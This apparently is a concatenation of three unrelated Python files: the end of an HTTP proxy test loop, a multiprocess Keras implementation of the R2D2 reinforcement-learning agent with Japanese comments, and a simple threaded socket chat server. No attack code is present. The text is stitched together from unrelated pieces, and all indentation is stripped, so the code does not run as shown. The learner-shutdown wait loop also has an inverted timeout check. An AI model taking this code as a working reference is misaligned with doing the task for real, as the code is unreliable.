"buffer_request_response_pre_body_generates_response_without_body",
"response_pre_body_prepend",
"response_body_prepend",
"response_body_append",
"buffer_request_response_pre_body_prepend",
"buffer_request_response_body_prepend",
"buffer_request_response_body_append",
]:
for send_immediately in [True, False]:
queue, proxy_process = test_util.runner.run(
"./tests-proxy/server/switch_callbacks_proxy",
[behavior, "immediately" if send_immediately else "collect"],
)
proxy_port = int(queue.get().strip())
for method in ["HEAD", "GET", "POST"]:
for suffix in [
"body_200_length",
"body_200_no_length",
"body_200_chunked",
"body_200_chunked_padded_length",
"no_body_200_length",
"no_body_200_no_length",
]:
test_requests(
proxy_port, behavior, send_immediately, method, suffix
)
proxy_process.kill()
|
r2d2.py
|
import tensorflow as tf
import rl
import rl.core
import keras
from keras.layers import *
from keras.models import Model
from keras.models import model_from_json
from keras import backend as K
import numpy as np
import multiprocessing as mp
import math
import os
import pickle
import enum
import time
import traceback
import ctypes
from .common import *
# 複数のプロセスでGPUを使用する設定
# https://qiita.com/studio_haneya/items/4dfaf2fb2ac44818e7e0
# https://github.com/tensorflow/tensorflow/issues/11812
for device in tf.config.experimental.list_physical_devices('GPU'):
tf.config.experimental.set_memory_growth(device, True)
#---------------------------------------------------
# manager
#---------------------------------------------------
class R2D2():
def __init__(self,
# model関係
input_shape,
input_type,
nb_actions, # アクション数(出力)
remote_memory,
actors,
optimizer,
processor=None,
metrics=[],
image_model=None, # imegeモデルを指定
input_sequence=4, # 入力フレーム数
dense_units_num=512, # Dense層のユニット数
enable_dueling_network=True, # dueling_network有効フラグ
dueling_network_type=DuelingNetwork.AVERAGE, # dueling_networkのアルゴリズム
lstm_type=LstmType.NONE, # LSTMのアルゴリズム
lstm_units_num=512, # LSTM層のユニット数
lstm_ful_input_length=1, # ステートフルLSTMの入力数
batch_size=32, # batch_size
# learner 関係
remote_memory_warmup_size=100, # 初期のメモリー確保用step数(学習しない)
target_model_update=500, # target networkのupdate間隔
enable_double_dqn=True, # DDQN有効フラグ
burnin_length=4, # burn-in期間
priority_exponent=0.9, # シーケンス長priorityを計算する際のη
# actor関係
actor_model_sync_interval=500, # learner から model を同期する間隔
gamma=0.99, # Q学習の割引率
enable_rescaling=True, # rescalingを有効にするか
rescaling_epsilon=0.001, # rescalingの定数
reward_multisteps=3, # multistep reward
action_interval=1, # アクションを実行する間隔
# その他
verbose=1,
):
#--- check
if lstm_type != LstmType.STATEFUL:
burnin_length = 0
assert remote_memory.capacity > batch_size, "Memory capacity is small.(Larger than batch size)"
assert remote_memory_warmup_size > batch_size, "Warmup steps is few.(Larger than batch size)"
if image_model is None:
assert input_type == InputType.VALUES
else:
assert input_type == InputType.GRAY_2ch or input_type == InputType.GRAY_3ch or input_type == InputType.COLOR
# 画像入力の制約
# LSTMを使う場合: 画像は(w,h,ch)で入力できます。
# LSTMを使わない場合:
# input_sequenceが1:全て使えます。
# input_sequenceが1以外:GRAY_2ch のみ使えます。
if lstm_type == LstmType.NONE and input_sequence != 1:
assert (input_type == InputType.GRAY_2ch), "input_iimage can use GRAY_2ch."
#---
self.kwargs = {
"input_shape": input_shape,
"input_type": input_type,
"nb_actions": nb_actions,
"remote_memory": remote_memory,
"actors": actors,
"optimizer": optimizer,
"processor": processor,
"metrics": metrics,
"image_model": image_model,
"input_sequence": input_sequence,
"dense_units_num": dense_units_num,
"enable_dueling_network": enable_dueling_network,
"dueling_network_type": dueling_network_type,
"lstm_type": lstm_type,
"lstm_units_num": lstm_units_num,
"lstm_ful_input_length": lstm_ful_input_length,
"batch_size": batch_size,
"remote_memory_warmup_size": remote_memory_warmup_size,
"target_model_update": target_model_update,
"enable_double_dqn": enable_double_dqn,
"enable_rescaling": enable_rescaling,
"rescaling_epsilon": rescaling_epsilon,
"burnin_length": burnin_length,
"priority_exponent": priority_exponent,
"actor_model_sync_interval": actor_model_sync_interval,
"gamma": gamma,
"reward_multisteps": reward_multisteps,
"action_interval": action_interval,
"verbose": verbose,
}
self.learner_ps = None
self.actors_ps = []
def __del__(self):
if self.learner_ps is not None:
self.learner_ps.terminate()
for p in self.actors_ps:
p.terminate()
def train(self,
nb_trains,
manager_allocate="/device:CPU:0",
learner_allocate="/device:GPU:0",
callbacks=[],
):
# GPU確認
# 参考: https://qiita.com/studio_haneya/items/4dfaf2fb2ac44818e7e0
if len(tf.config.experimental.list_physical_devices('GPU')) > 0:
self.enable_GPU = True
else:
self.enable_GPU = False
#--- init
self.kwargs["nb_trains"] = nb_trains
self.kwargs["callbacks"] = R2D2CallbackList(callbacks)
actor_num = len(self.kwargs["actors"])
learner_allocate = learner_allocate
verbose = self.kwargs["verbose"]
if self.enable_GPU:
self._train_allocate(manager_allocate, actor_num, learner_allocate, verbose)
else:
self._train(actor_num, learner_allocate, verbose)
def _train_allocate(self, allocate, *args):
with tf.device(allocate):
self._train(*args)
def _train(self, actor_num, learner_allocate, verbose):
# 通信用変数
self.learner_end_signal = mp.Value(ctypes.c_bool, False)
self.is_learner_end = mp.Value(ctypes.c_bool, False)
self.train_count = mp.Value(ctypes.c_int, 0)
# 経験通信用
exp_q = mp.Queue()
weights_qs = []
self.is_actor_ends = []
for _ in range(actor_num):
# model weights通信用
weights_q = mp.Queue()
weights_qs.append(weights_q)
self.is_actor_ends.append(mp.Value(ctypes.c_bool, False))
self.kwargs["callbacks"].on_r2d2_train_begin()
t0 = time.time()
try:
# learner ps の実行
learner_args = (
self.kwargs,
exp_q,
weights_qs,
self.learner_end_signal,
self.is_learner_end,
self.train_count,
)
if self.enable_GPU:
learner_args = (learner_allocate,) + learner_args
self.learner_ps = mp.Process(target=learner_run_allocate, args=learner_args)
else:
self.learner_ps = mp.Process(target=learner_run, args=learner_args)
self.learner_ps.start()
# actor ps の実行
self.actors_ps = []
for i in range(actor_num):
# args
actor_args = (
i,
self.kwargs,
exp_q,
weights_qs[i],
self.is_learner_end,
self.train_count,
self.is_actor_ends[i],
)
if self.enable_GPU:
actor = self.kwargs["actors"][i]
actor_args = (actor.allocate,) + actor_args
ps = mp.Process(target=actor_run_allocate, args=actor_args)
else:
ps = mp.Process(target=actor_run, args=actor_args)
self.actors_ps.append(ps)
ps.start()
# 終了を待つ
while True:
time.sleep(1) # polling time
# learner終了確認
if self.is_learner_end.value:
break
# actor終了確認
f = True
for is_actor_end in self.is_actor_ends:
if not is_actor_end.value:
f = False
break
if f:
break
except KeyboardInterrupt:
pass
except Exception:
print(traceback.format_exc())
if verbose > 0:
print("done, took {:.3f} seconds".format(time.time() - t0))
self.kwargs["callbacks"].on_r2d2_train_end()
# learner に終了を投げる
self.learner_end_signal.value = True
# learner が終了するまで待つ
t0 = time.time()
while not self.is_learner_end.value:
if time.time() - t0 < 360: # timeout
if verbose > 0:
print("learner end timeout.")
break
time.sleep(1)
def createTestAgent(self, test_actor, learner_model_path):
return R2D2.createTestAgentStatic(self.kwargs, test_actor, learner_model_path)
@staticmethod
def createTestAgentStatic(manager_kwargs, test_actor, learner_model_path):
test_actor = ActorRunner(-1, manager_kwargs, test_actor(), None, None, None, None)
with open(learner_model_path, 'rb') as f:
d = pickle.load(f)
test_actor.model.set_weights(d["weights"])
return test_actor
#---------------------------------------------------
# create model
#---------------------------------------------------
def build_compile_model(kwargs):
input_shape = kwargs["input_shape"]
input_type = kwargs["input_type"]
image_model = kwargs["image_model"]
batch_size = kwargs["batch_size"]
input_sequence = kwargs["input_sequence"]
lstm_type = kwargs["lstm_type"]
lstm_units_num = kwargs["lstm_units_num"]
enable_dueling_network = kwargs["enable_dueling_network"]
dense_units_num = kwargs["dense_units_num"]
nb_actions = kwargs["nb_actions"]
dueling_network_type = kwargs["dueling_network_type"]
optimizer = kwargs["optimizer"]
metrics = kwargs["metrics"]
if input_type == InputType.VALUES:
if lstm_type != LstmType.STATEFUL:
c = input_ = Input(shape=(input_sequence,) + input_shape)
else:
c = input_ = Input(batch_shape=(batch_size, input_sequence) + input_shape)
elif input_type == InputType.GRAY_2ch:
if lstm_type != LstmType.STATEFUL:
c = input_ = Input(shape=(input_sequence,) + input_shape)
else:
c = input_ = Input(batch_shape=(batch_size, input_sequence) + input_shape)
else:
if lstm_type != LstmType.STATEFUL:
c = input_ = Input(shape=input_shape)
else:
c = input_ = Input(batch_shape=(batch_size, input_sequence) + input_shape)
if image_model is None:
# input not image
if lstm_type == LstmType.NONE:
c = Flatten()(c)
else:
c = TimeDistributed(Flatten())(c)
else:
# input image
if lstm_type == LstmType.NONE:
enable_lstm = False
if input_type == InputType.GRAY_2ch:
# (input_seq, w, h) ->(w, h, input_seq)
c = Permute((2, 3, 1))(c)
elif lstm_type == LstmType.STATELESS or lstm_type == LstmType.STATEFUL:
enable_lstm = True
if input_type == InputType.GRAY_2ch:
# (time steps, w, h) -> (time steps, w, h, ch)
c = Reshape((input_sequence, ) + input_shape + (1,) )(c)
else:
raise ValueError('lstm_type is not undefined')
c = image_model.create_image_model(c, enable_lstm)
# lstm layer
if lstm_type == LstmType.STATELESS:
c = LSTM(lstm_units_num, name="lstm")(c)
elif lstm_type == LstmType.STATEFUL:
c = LSTM(lstm_units_num, stateful=True, name="lstm")(c)
# dueling network
if enable_dueling_network:
# value
v = Dense(dense_units_num, activation="relu")(c)
v = Dense(1, name="v")(v)
# advance
adv = Dense(dense_units_num, activation='relu')(c)
adv = Dense(nb_actions, name="adv")(adv)
# 連結で結合
c = Concatenate()([v,adv])
if dueling_network_type == DuelingNetwork.AVERAGE:
c = Lambda(lambda a: K.expand_dims(a[:, 0], -1) + a[:, 1:] - K.mean(a[:, 1:], axis=1, keepdims=True), output_shape=(nb_actions,))(c)
elif dueling_network_type == DuelingNetwork.MAX:
c = Lambda(lambda a: K.expand_dims(a[:, 0], -1) + a[:, 1:] - K.max(a[:, 1:], axis=1, keepdims=True), output_shape=(nb_actions,))(c)
elif dueling_network_type == DuelingNetwork.NAIVE:
c = Lambda(lambda a: K.expand_dims(a[:, 0], -1) + a[:, 1:], output_shape=(nb_actions,))(c)
else:
raise ValueError('dueling_network_type is not undefined')
else:
c = Dense(dense_units_num, activation="relu")(c)
c = Dense(nb_actions, activation="linear", name="adv")(c)
model = Model(input_, c)
model.compile(loss=clipped_error_loss, optimizer=optimizer, metrics=metrics)
return model
#---------------------------------------------------
# learner
#---------------------------------------------------
def learner_run_allocate(allocate, *args):
with tf.device(allocate):
learner_run(*args)
def learner_run(
kwargs,
exp_q,
weights_qs,
learner_end_signal,
is_learner_end,
train_count,
):
nb_trains = kwargs["nb_trains"]
verbose = kwargs["verbose"]
callbacks = kwargs["callbacks"]
try:
runner = LearnerRunner(kwargs, exp_q, weights_qs, train_count)
callbacks.on_r2d2_learner_begin(runner)
# learner はひたすら学習する
if verbose > 0:
print("Learner Start!")
while True:
callbacks.on_r2d2_learner_train_begin(runner)
runner.train()
callbacks.on_r2d2_learner_train_end(runner)
# 終了判定
if learner_end_signal.value:
break
# 終了判定
if nb_trains > 0:
if runner.train_count.value > nb_trains:
break
except KeyboardInterrupt:
pass
except Exception:
print(traceback.format_exc())
try:
if verbose > 0:
print("Learning End. Train Count:{}".format(runner.train_count.value))
callbacks.on_r2d2_learner_end(runner)
except Exception:
print(traceback.format_exc())
is_learner_end.value = True
class LearnerRunner():
def __init__(self,
kwargs,
exp_q,
weights_qs,
train_count,
):
self.exp_q = exp_q
self.weights_qs = weights_qs
self.kwargs = kwargs
self.memory = kwargs["remote_memory"]
self.memory_warmup_size = kwargs["remote_memory_warmup_size"]
self.gamma = kwargs["gamma"]
self.batch_size = kwargs["batch_size"]
self.enable_double_dqn = kwargs["enable_double_dqn"]
self.target_model_update = kwargs["target_model_update"]
self.input_sequence = kwargs["input_sequence"]
self.lstm_type = kwargs["lstm_type"]
self.burnin_length = kwargs["burnin_length"]
self.priority_exponent = kwargs["priority_exponent"]
self.actor_model_sync_interval = kwargs["actor_model_sync_interval"]
self.reward_multisteps = kwargs["reward_multisteps"]
self.lstm_ful_input_length = kwargs["lstm_ful_input_length"]
self.actors_num = len(kwargs["actors"])
# train_count
self.train_count = train_count
# model create
self.model = build_compile_model(kwargs)
self.target_model = build_compile_model(kwargs)
if self.lstm_type == LstmType.STATEFUL:
self.lstm = self.model.get_layer("lstm")
self.target_lstm = self.target_model.get_layer("lstm")
def train(self):
# 一定毎に Actor に weights を送る
if self.train_count.value % self.actor_model_sync_interval == 0:
weights = self.model.get_weights()
for q in self.weights_qs:
# 送る
q.put(weights)
# experience があれば RemoteMemory に追加
for _ in range(self.exp_q.qsize()):
exp = self.exp_q.get(timeout=1)
self.memory.add(exp, exp[4])
# RemoteMemory が一定数貯まるまで学習しない。
if len(self.memory) <= self.memory_warmup_size:
return
# memory から優先順位に基づき状態を取得
(indexes, batchs, weights) = self.memory.sample(self.batch_size, self.train_count.value)
# 学習(長いので関数化)
if self.lstm_type == LstmType.STATEFUL:
self.train_model_ful(indexes, batchs, weights)
else:
self.train_model(indexes, batchs, weights)
self.train_count.value += 1 # 書き込みは一人なのでlockは不要
# target networkの更新
if self.train_count.value % self.target_model_update == 0:
self.target_model.set_weights(self.model.get_weights())
# ノーマルの学習
def train_model(self, indexes, batchs, weights):
state0_batch = []
action_batch = []
reward_batch = []
state1_batch = []
for batch in batchs:
state0_batch.append(batch[0])
action_batch.append(batch[1])
reward_batch.append(batch[2])
state1_batch.append(batch[3])
state0_batch = np.asarray(state0_batch)
state1_batch = np.asarray(state1_batch)
# 更新用に現在のQネットワークを出力(Q network)
state0_qvals = self.model.predict(state0_batch, self.batch_size)
if self.enable_double_dqn:
# TargetNetworkとQNetworkのQ値を出す
state1_qvals_model = self.model.predict(state1_batch, self.batch_size)
state1_qvals_target = self.target_model.predict(state1_batch, self.batch_size)
else:
# 次の状態のQ値を取得(target_network)
state1_qvals_target = self.target_model.predict(state1_batch, self.batch_size)
for i in range(self.batch_size):
if self.enable_double_dqn:
action = state1_qvals_model[i].argmax() # modelからアクションを出す
maxq = state1_qvals_target[i][action] # Q値はtarget_modelを使って出す
else:
maxq = state1_qvals_target[i].max()
# priority計算
q0 = state0_qvals[i][action_batch[i]]
td_error = reward_batch[i] + (self.gamma ** self.reward_multisteps) * maxq - q0
priority = abs(td_error)
# Q値の更新
state0_qvals[i][action_batch[i]] += td_error * weights[i]
# priorityを更新を更新
self.memory.update(indexes[i], batchs[i], priority)
# 学習
self.model.train_on_batch(state0_batch, state0_qvals)
# ステートフルLSTMの学習
def train_model_ful(self, indexes, batchs, weights):
hidden_s0 = []
hidden_s1 = []
for batch in batchs:
# batchサイズ分あるけどすべて同じなので0番目を取得
hidden_s0.append(batch[3][0][0])
hidden_s1.append(batch[3][1][0])
hidden_states = [np.asarray(hidden_s0), np.asarray(hidden_s1)]
# init hidden_state
self.lstm.reset_states(hidden_states)
self.target_lstm.reset_states(hidden_states)
# predict
hidden_states_arr = []
if self.burnin_length == 0:
hidden_states_arr.append(hidden_states)
state_batch_arr = []
model_qvals_arr = []
target_qvals_arr = []
prioritys = [ [] for _ in range(self.batch_size)]
for seq_i in range(self.burnin_length + self.reward_multisteps + self.lstm_ful_input_length):
# state
state_batch = [ batch[0][seq_i] for batch in batchs ]
state_batch = np.asarray(state_batch)
# hidden_state更新およびQ値取得
model_qvals = self.model.predict(state_batch, self.batch_size)
target_qvals = self.target_model.predict(state_batch, self.batch_size)
# burnin-1
if seq_i < self.burnin_length-1:
continue
hidden_states_arr.append([K.get_value(self.lstm.states[0]), K.get_value(self.lstm.states[1])])
# burnin
if seq_i < self.burnin_length:
continue
state_batch_arr.append(state_batch)
model_qvals_arr.append(model_qvals)
target_qvals_arr.append(target_qvals)
# train
for seq_i in range(self.lstm_ful_input_length):
# state0 の Qval (multistep前)
state0_qvals = model_qvals_arr[seq_i]
# batch
for batch_i in range(self.batch_size):
# maxq
if self.enable_double_dqn:
action = model_qvals_arr[seq_i+self.reward_multisteps][batch_i].argmax() # modelからアクションを出す
maxq = target_qvals_arr[seq_i+self.reward_multisteps][batch_i][action] # Q値はtarget_modelを使って出す
else:
maxq = target_qvals_arr[seq_i+self.reward_multisteps][batch_i].max()
# priority
batch_action = batchs[batch_i][1][seq_i]
q0 = state0_qvals[batch_i][batch_action]
reward = batchs[batch_i][2][seq_i]
td_error = reward + (self.gamma ** self.reward_multisteps) * maxq - q0
priority = abs(td_error)
prioritys[batch_i].append(priority)
# Q値の更新
state0_qvals[batch_i][batch_action] += td_error * weights[batch_i]
# train
self.lstm.reset_states(hidden_states_arr[seq_i])
self.model.train_on_batch(state_batch_arr[seq_i], state0_qvals)
#--- priority update
for batch_i, batch in enumerate(batchs):
priority = self.priority_exponent * np.max(prioritys[batch_i]) + (1-self.priority_exponent) * np.average(prioritys[batch_i])
self.memory.update(indexes[batch_i], batch, priority)
def save_weights(self, filepath, overwrite=False, save_memory=False):
if overwrite or not os.path.isfile(filepath):
d = {
"weights": self.model.get_weights(),
"train": self.train_count.value,
}
with open(filepath, 'wb') as f:
pickle.dump(d, f)
# memory
if save_memory:
d = self.memory.get_memorys()
with open(filepath + ".mem", 'wb') as f:
pickle.dump(d, f)
def load_weights(self, filepath, load_memory=False):
with open(filepath, 'rb') as f:
d = pickle.load(f)
self.model.set_weights(d["weights"])
self.target_model.set_weights(d["weights"])
self.train_count.value = d["train"]
# memory
if load_memory:
filepath = filepath + ".mem"
if os.path.isfile(filepath):
with open(filepath, 'rb') as f:
d = pickle.load(f)
self.memory.set_memorys(d)
#---------------------------------------------------
# actor
#---------------------------------------------------
class ActorStop(rl.callbacks.Callback):
def __init__(self, is_learner_end):
self.is_learner_end = is_learner_end
def on_step_end(self, episode, logs={}):
if self.is_learner_end.value:
raise KeyboardInterrupt()
class Actor():
allocate = "/device:CPU:0"
def getPolicy(self, actor_index, actor_num):
raise NotImplementedError()
def fit(self, index, agent):
raise NotImplementedError()
def actor_run_allocate(allocate, *args):
with tf.device(allocate):
actor_run(*args)
def actor_run(
actor_index,
kwargs,
exp_q,
weights_q,
is_learner_end,
train_count,
is_actor_end,
):
verbose = kwargs["verbose"]
callbacks = kwargs["callbacks"]
actor = kwargs["actors"][actor_index]()
runner = ActorRunner(
actor_index,
kwargs,
actor,
exp_q,
weights_q,
is_learner_end,
train_count,
)
try:
callbacks.on_r2d2_actor_begin(actor_index, runner)
# run
if verbose > 0:
print("Actor{} Start!".format(actor_index))
actor.fit(actor_index, runner)
except KeyboardInterrupt:
pass
except Exception:
print(traceback.format_exc())
try:
if verbose > 0:
print("Actor{} End!".format(actor_index))
callbacks.on_r2d2_actor_end(actor_index, runner)
except Exception:
print(traceback.format_exc())
is_actor_end.value = True
class ActorRunner(rl.core.Agent):
def __init__(self,
actor_index,
kwargs,
actor,
exp_q,
weights_q,
is_learner_end,
train_count,
):
super(ActorRunner, self).__init__(kwargs["processor"])
self.is_learner_end = is_learner_end
self.train_count = train_count
self.kwargs = kwargs
self.callbacks = kwargs.get("callbacks", [])
self.actor_index = actor_index
self.actor = actor
self.exp_q = exp_q
self.weights_q = weights_q
self.actors_num = len(kwargs["actors"])
self.enable_rescaling = kwargs["enable_rescaling"]
self.rescaling_epsilon = kwargs["rescaling_epsilon"]
self.action_policy = actor.getPolicy(actor_index, self.actors_num)
self.nb_actions = kwargs["nb_actions"]
self.input_shape = kwargs["input_shape"]
self.input_sequence = kwargs["input_sequence"]
self.gamma = kwargs["gamma"]
self.reward_multisteps = kwargs["reward_multisteps"]
self.action_interval = kwargs["action_interval"]
self.burnin_length = kwargs["burnin_length"]
self.lstm_type = kwargs["lstm_type"]
self.enable_dueling_network = kwargs["enable_dueling_network"]
self.priority_exponent = kwargs["priority_exponent"]
self.lstm_ful_input_length = kwargs["lstm_ful_input_length"]
self.batch_size = kwargs["batch_size"]
self.verbose = kwargs["verbose"]
# create model
self.model = build_compile_model(kwargs)
if self.lstm_type == LstmType.STATEFUL:
self.lstm = self.model.get_layer("lstm")
model_json = self.model.to_json()
self.action_policy.compile(model_json)
self.compiled = True # super
def reset_states(self): # override
self.repeated_action = 0
if self.lstm_type == LstmType.STATEFUL:
multi_len = self.reward_multisteps + self.lstm_ful_input_length - 1
self.recent_actions = [ 0 for _ in range(multi_len + 1)]
self.recent_rewards = [ 0 for _ in range(multi_len)]
self.recent_rewards_multistep = [ 0 for _ in range(self.lstm_ful_input_length)]
tmp = self.burnin_length + self.input_sequence + multi_len
self.recent_observations = [
np.zeros(self.input_shape) for _ in range(tmp)
]
tmp = self.burnin_length + multi_len + 1
self.recent_observations_wrap = [
[np.zeros(self.input_shape) for _ in range(self.input_sequence)] for _ in range(tmp)
]
# hidden_state: [(batch_size, lstm_units_num), (batch_size, lstm_units_num)]
tmp = self.burnin_length + multi_len + 1+1
self.model.reset_states()
self.recent_hidden_states = [
[K.get_value(self.lstm.states[0]), K.get_value(self.lstm.states[1])] for _ in range(tmp)
]
else:
self.recent_actions = [ 0 for _ in range(self.reward_multisteps+1)]
self.recent_rewards = [ 0 for _ in range(self.reward_multisteps)]
self.recent_rewards_multistep = 0
self.recent_observations = [
np.zeros(self.input_shape) for _ in range(self.input_sequence + self.reward_multisteps)
]
def compile(self, optimizer, metrics=[]): # override
self.compiled = True # super
def save_weights(self, filepath, overwrite=False): # override
if overwrite or not os.path.isfile(filepath):
filepath = filepath.format(index=self.actor_index)
d = self.action_policy.get_weights()
with open(filepath, 'wb') as f:
pickle.dump(d, f)
def load_weights(self, filepath): # override
filepath = filepath.format(index=self.actor_index)
with open(filepath, 'rb') as f:
d = pickle.load(f)
self.action_policy.set_weights(d)
def forward(self, observation): # override
# observation
self.recent_observations.pop(0)
self.recent_observations.append(observation)
if self.lstm_type == LstmType.STATEFUL:
self.recent_observations_wrap.pop(0)
self.recent_observations_wrap.append(self.recent_observations[-self.input_sequence:])
# tmp
self._state0 = self.recent_observations_wrap[-self.burnin_length -1]
else:
# tmp
self._state0 = self.recent_observations[:self.input_sequence]
# tmp
self._qvals = None
self._state1 = self.recent_observations[-self.input_sequence:]
self._state1_np = np.asarray(self._state1)
self._state0_np = np.asarray(self._state0)
if self.training:
# experienceを送る
if self.lstm_type == LstmType.STATEFUL:
#--- priorityを計算
# 初回しか使わないので計算量のかかるburn-inは省略
# (直前のhidden_statesなのでmodelによる誤差もほぼないため)
prioritys = []
for i in range(self.lstm_ful_input_length):
state0 = self._state0_np
state1 = self._state1_np
hidden_states0 = self.recent_hidden_states[self.burnin_length + i]
hidden_states1 = self.recent_hidden_states[self.burnin_length + i + self.reward_multisteps]
action = self.recent_actions[i]
reward = self.recent_rewards_multistep[i]
# batchサイズ分増やす
state0_batch = np.full((self.batch_size,)+state0.shape, state0)
state1_batch = np.full((self.batch_size,)+state1.shape, state1)
# 現在のQネットワークを出力
self.lstm.reset_states(hidden_states0)
state0_qvals = self.model.predict(state0_batch, self.batch_size)[0]
self.lstm.reset_states(hidden_states1)
state1_qvals = self.model.predict(state1_batch, self.batch_size)[0]
maxq = np.max(state1_qvals)
td_error = reward + (self.gamma ** self.reward_multisteps) * maxq
priority = abs(td_error - state0_qvals[action])
prioritys.append(priority)
# 今回使用したsamplingのpriorityを更新
priority = self.priority_exponent * np.max(prioritys) + (1-self.priority_exponent) * np.average(prioritys)
# local memory
local_memory = (
self.recent_observations_wrap[:],
self.recent_actions[0:self.lstm_ful_input_length],
self.recent_rewards_multistep[:],
self.recent_hidden_states[0],
priority,
)
else:
state0 = self._state0_np[np.newaxis,:]
state1 = self._state1_np[np.newaxis,:]
action = self.recent_actions[0]
reward = self.recent_rewards_multistep
#--- priority の計算
state0_qvals = self.model.predict(state0, 1)[0]
state1_qvals = self.model.predict(state1, 1)[0]
maxq = np.max(state1_qvals)
td_error = reward + (self.gamma ** self.reward_multisteps) * maxq - state0_qvals[action]
priority = abs(td_error)
# local memory
local_memory = (
self._state0,
action,
reward,
self._state1,
priority,
)
# RemoteMemory に送信
self.exp_q.put(local_memory)
# 状態の更新
if self.lstm_type == LstmType.STATEFUL:
self.lstm.reset_states(self.recent_hidden_states[-1])
# hidden_state を更新しつつQ値も取得
state = self._state1_np
pred_state = np.full((self.batch_size,)+state.shape, state) # batchサイズ分増やす
self._qvals = self.model.predict(pred_state, batch_size=self.batch_size)[0]
hidden_state = [K.get_value(self.lstm.states[0]), K.get_value(self.lstm.states[1])]
self.recent_hidden_states.pop(0)
self.recent_hidden_states.append(hidden_state)
# フレームスキップ(action_interval毎に行動を選択する)
action = self.repeated_action
if self.step % self.action_interval == 0:
# 行動を決定
if self.training:
# training中かつNoisyNetが使ってない場合は action policyに従う
action = self.action_policy.select_action(self)
else:
# テスト中またはNoisyNet中の場合
action = np.argmax(self.get_qvals())
# リピート用
self.repeated_action = action
# アクション保存
self.recent_actions.pop(0)
self.recent_actions.append(action)
return action
def get_qvals(self):
if self.lstm_type == LstmType.STATEFUL:
return self._qvals
else:
if self._qvals is None:
state = self._state1_np[np.newaxis,:]
self._qvals = self.model.predict(state, batch_size=1)[0]
return self._qvals
def get_state(self):
return self._state1_np
def get_prev_state(self):
if self.lstm_type == LstmType.STATEFUL:
observation = self._state0_np
action = self.recent_actions[-self.reward_multisteps-1]
reward = self.recent_rewards_multistep[-self.reward_multisteps]
else:
observation = self._state0_np
action = self.recent_actions[0]
reward = self.recent_rewards_multistep
return (observation, action, reward)
def backward(self, reward, terminal): # override
# terminal は env が終了状態ならTrue
if not self.training:
return []
# 報酬の保存
self.recent_rewards.pop(0)
self.recent_rewards.append(reward)
# multi step learning の計算
_tmp = 0
for i in range(-self.reward_multisteps, 0):
r = self.recent_rewards[i]
_tmp += r * (self.gamma ** i)
# rescaling
if self.enable_rescaling:
_tmp = rescaling(_tmp)
if self.lstm_type == LstmType.STATEFUL:
self.recent_rewards_multistep.pop(0)
self.recent_rewards_multistep.append(_tmp)
else:
self.recent_rewards_multistep = _tmp
# weightが届いていればmodelを更新
if not self.weights_q.empty():
weights = self.weights_q.get(timeout=1)
# 空にする(念のため)
while not self.weights_q.empty():
self.weights_q.get(timeout=1)
self.model.set_weights(weights)
return []
@property
def layers(self): # override
return self.model.layers[:]
def fit(self, env, nb_steps=99_999_999_999, callbacks=[], **kwargs): # override
if self.actor_index == -1:
# test_actor
super().fit(nb_steps, callbacks, **kwargs)
return
callbacks.extend(self.callbacks.callbacks)
# stop
callbacks.append(ActorStop(self.is_learner_end))
# keras-rlでの学習
super().fit(env, nb_steps=nb_steps, callbacks=callbacks, **kwargs)
class R2D2Callback(rl.callbacks.Callback):
def __init__(self):
pass
def on_r2d2_train_begin(self):
pass
def on_r2d2_train_end(self):
pass
def on_r2d2_learner_begin(self, learner):
pass
def on_r2d2_learner_end(self, learner):
pass
def on_r2d2_learner_train_begin(self, learner):
pass
def on_r2d2_learner_train_end(self, learner):
pass
def on_r2d2_actor_begin(self, actor_index, runner):
pass
def on_r2d2_actor_end(self, actor_index, runner):
pass
class R2D2CallbackList(R2D2Callback):
def __init__(self, callbacks):
self.callbacks = callbacks
def on_r2d2_train_begin(self):
for callback in self.callbacks:
callback.on_r2d2_train_begin()
def on_r2d2_train_end(self):
for callback in self.callbacks:
callback.on_r2d2_train_end()
def on_r2d2_learner_begin(self, learner):
for callback in self.callbacks:
callback.on_r2d2_learner_begin(learner)
def on_r2d2_learner_end(self, learner):
for callback in self.callbacks:
callback.on_r2d2_learner_end(learner)
def on_r2d2_learner_train_begin(self, learner):
for callback in self.callbacks:
callback.on_r2d2_learner_train_begin(learner)
def on_r2d2_learner_train_end(self, learner):
for callback in self.callbacks:
callback.on_r2d2_learner_train_end(learner)
def on_r2d2_actor_begin(self, actor_index, runner):
for callback in self.callbacks:
callback.on_r2d2_actor_begin(actor_index, runner)
def on_r2d2_actor_end(self, actor_index, runner):
for callback in self.callbacks:
callback.on_r2d2_actor_end(actor_index, runner)
|
Server.py
|
#server.py
import json
import socket
from threading import Thread
ADDRESS = ('localhost', 12321)
CONNECTION = None
SERVERNAME = "SOCKETER-SERVER"
CONNECTION_POOL = {}
init_msg = """
______ ___ ____ _ _______ _____ _____ ____ __
/ / ___| / _ \ / ___| |/ / ____|_ _| ____| _ \ / /
/ /\___ \| | | | | | ' /| _| | | | _| | |_) | / /
/ / ___) | |_| | |___| . \| |___ | | | |___| _ < / /
/_/ |____/ \___/ \____|_|\_\_____| |_| |_____|_| \_\/_/
"""
def init():
global CONNECTION
CONNECTION = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
CONNECTION.bind(ADDRESS)
CONNECTION.listen(5)
print(init_msg)
def send_msg(socket1, username, cmd, data, target):
jdata = {}
jdata['cmd'] = cmd
jdata['target'] = target
jdata['from'] = username
jdata['data'] = data
jstr = json.dumps(jdata)
socket1.sendall(jstr.encode('utf-8'))
def connection_control():
while True:
client, client_address = CONNECTION.accept()
newThread = Thread(target=msg_control,args=(client,))
newThread.setDaemon(True)
newThread.start()
def msg_control(client):
client.sendall((init_msg + "\n Connect to chat-server successfully!").encode('utf-8'))
while True:
try:
data = client.recv(1024).decode('utf-8')
jdata = json.loads(data)
user = jdata['from']
target = jdata['target']
if jdata['cmd'] == "act_connect":
CONNECTION_POOL[user] = client
if jdata['cmd'] == "act_send_msg":
if jdata['target'] not in CONNECTION_POOL:
send_msg(client,SERVERNAME,"ERROR",f"ERROR:User{jdata['target']} does not online!",user)
else:
target_connection = CONNECTION_POOL[target]
send_msg(target_connection,user,"act_send_msg",jdata['data'],target)
elif jdata['cmd'] == "act_req_list":
print(user + " req_list")
userlist = str(CONNECTION_POOL.keys())
send_msg(client,SERVERNAME,"return_list",userlist,user)
except Exception:
remove_client(user)
break
def remove_client(user):
connection = CONNECTION_POOL[user]
if None != connection:
connection.close()
CONNECTION_POOL.pop(user)
print(f"{user} Offline.")
if __name__ == "__main__":
init()
t1 = Thread(target=connection_control)
t1.setDaemon(True)
t1.start()
while True:
cmd = input("[SOCKETER-SERVER]:")
